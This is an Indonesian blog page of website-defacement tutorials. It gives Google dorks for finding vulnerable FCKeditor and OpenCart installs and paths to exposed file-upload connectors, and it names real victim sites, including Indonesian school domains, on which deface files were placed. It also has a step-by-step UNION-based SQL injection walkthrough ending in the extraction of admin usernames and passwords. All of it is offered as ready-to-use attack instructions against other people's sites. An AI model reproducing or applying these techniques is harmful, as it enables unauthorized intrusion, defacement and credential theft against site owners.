Showing posts with label Deface. Show all posts
Showing posts with label Deface. Show all posts

Deface FCK Editor



Saya mau share Cara deface yg lainnya nih tapi hanya bisa uploud file { txt }
Gak ush lama lama langsung TKP ajha :D

1. Cari target dengan Google Dork:
inurl:/apps/fckeditor/

2. Pilih salah satu target yg muncul pada google..
Ex : http://workabout.us/apps/fckeditor/2.5.1/editor/filemanager/connectors/php/

3. Exploitnya ..
http://target.com/[patch]/apps/fckeditor/2.5.1/editor/filemanager/connectors/uploadtest.html

jadinya :
http://workabout.us/apps/fckeditor/2.5.1/editor/filemanager/connectors/uploadtest.html

4.Kalo udah masuk ... ganti ASP jadi PHP ..

5.Siapin file deface kita yg berformat *.txt

6. Kembali ke halaman , klik Browse dan cari file deface kita yg udah disiapin tadi ..

7. Terakhir ... klik "Send it to the Server"

************************************************************************

Untuk melihat file deface'an kita kasih exploit dibawah ini tepat dibelakang target ..
/userfiles/16/namafile.txt   

jadinya seperti ini :
http://target.com/userfiles/16/namafile.txt 
 
************************************************************************
Mungkin deface'nya terlihat simple, tapi coba lihat efeknya ... BEBERAPA link yg muncul pada google dengan dork diatas ... secara otomatis akan langsung terdeface dengan sendirinya ... 

************************************************************************



Sumber : http://hacker-newbie.org/showthread.php?tid=14351&highlight=tutorial+deface

tag : tutorial cara deface how to defacing deface web FCK editor

Cara Deface Web



Ok sekarang saya akan memberitahu beberapa cara mendeface web dengan mudah atau pun sulit .

Cara yang ke :

1. Khusus domain Sch.id
    http://rifqi-rizz.blogspot.com/2012/01/cara-deface-situs-httpsiteschid.html

2. Remote file uploud open cart (all domain)
    http://rifqi-rizz.blogspot.com/2012/01/cara-deface-menggunakan-cara-remote.html

3. Deface menggunakan My Sqli
    http://rifqi-rizz.blogspot.com/2012/01/tutorial-deface-my-sqli.html


Ok di atas adalah beberapa cara Deface web.
Next time saya akan meng update Cara Deface web lebih banyak lagi, kunjungi terus blog http://rifqi-rizz.blogspot.com/ agar kalian bisa lihat update update terbaru dari saya.
Terima Kasih.

tag : deface web cara tutorial sqli sch sch.id remote file uploud open cart

Tutorial Deface Remote File Upload Opencart



Ok sekarang langsung saja kita praktekan cara Deface Remote File Upload Opencart
 
1.  Tentunya kita memerlukan Dork untuk mencari targetnya di Google
      Dork : Powered By OpenCart site:com

2.  Sudah dapet targetnya ?
     Contoh : http://www.homemadestuff.co.uk

3.  Setelah itu kita membutuhkan POC
     POC : admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html

4.  Kita Inject Exploitnya dengan POC diatas, sehingga jadinya seperti ini :
    
http://http://www.homemadestuff.co.uk/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html
 
5.  Maka akan muncul sebuah tampilan
     Contoh :
http://imageshack.us/f/215/61228773.png/

6.  Ganti  connectornya menjadi  dari ASP menjadi PHP

7.  Upload File Tampilan Deface kita (*.html  atau *.htm)

8.  Jika berhasil maka ada bacaan alert seperti ini "file uploaded with no errors"
     Contoh : http://imageshack.us/f/841/76539701.png/

9.  Untuk melihat apakan berhasil di upload atau tidak kita ke "Get Folders and Files"
     dan lihat hasilnya.


10. Jika berhasil kamu tinggal masukin nama file deface kamu di blakang site nya,,
      Hasil : 
http://www.homemadestuff.co.uk/rifqi.html

 beberapa kata saya ambil dari blog ini : http://noi-shadow.blogspot.com/2011/12/tekhnik-remote-file-upload-opencart.html

 Tag : deface cara tutorial remote uploud open cart 

Cara Deface situs http://site.sch.id



Cuma mau S'hare bug l'wass .. ..

Siapin file .txt .. ..

B'ka http://google.com/ .. ..

M'sukin Dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?

P'lih k'rban t'rserah .. ..

Contoh korban : http://smp1ponjong.sch.id/html/siswa.php

M'sukin Exploit :

http://smp1ponjong.sch.id/html/siswa.php
 

G'nti j'di :
http://smp1ponjong.sch.id/editor/filemanager/connectors/test.html
 

D'kolom Connector yang default'a ASP j'dikan PHP t'rus Resource Type g'nti File .. .. T'rus klik Browse .. ..
c'ri file.txt yang uda d'siapin .. .. k'lo uda klik Open > Upload

Hasil'a :
http://site.sch.id/userfiles/file/namafile.txt
http://site.sch.id/userfiles/namafile.txt



Ini c'ntoh'a :

http://sma1jepon.sch.id/userfiles/file/Rifqii.txt

Sumber

Kalau ada yang mau di tanyain comment ajah ya

tag : deface sch.id sch id cara tutorial

Tutorial Deface My SQLI



 
Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ' atau -
comments: /* atau --
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ' pada akhir url atau menambahkan karakter "-" untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100' atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):


==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya...
gunakan perintah : order by

contoh:


[site]/berita.php?id=-100+order+by+1-- atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)...
misal:


[site]/berita.php?id=-100+order+by+1--
[site]/berita.php?id=-100+order+by+2--
[site]/berita.php?id=-100+order+by+3--
[site]/berita.php?id=-100+order+by+4--

sehingga muncul error atau hilang pesan error...
misal: [site]/berita.php?id=-100+order+by+9--

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8--


===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..


============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--

seumpama table yang muncul adalah "admin"


===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema. ​tables+where+table_schema=database()--

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0xhexa--

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E



[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema ​.columns+where+table_name=0x61646D696E--

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)--

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,username,password),6,7,8+from+admin--

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .


Silahkan DI pelajari Kaka 1 .

Kalo ada yg susah jngan malu bertanya ya .
Sumber

Kategori

Kategori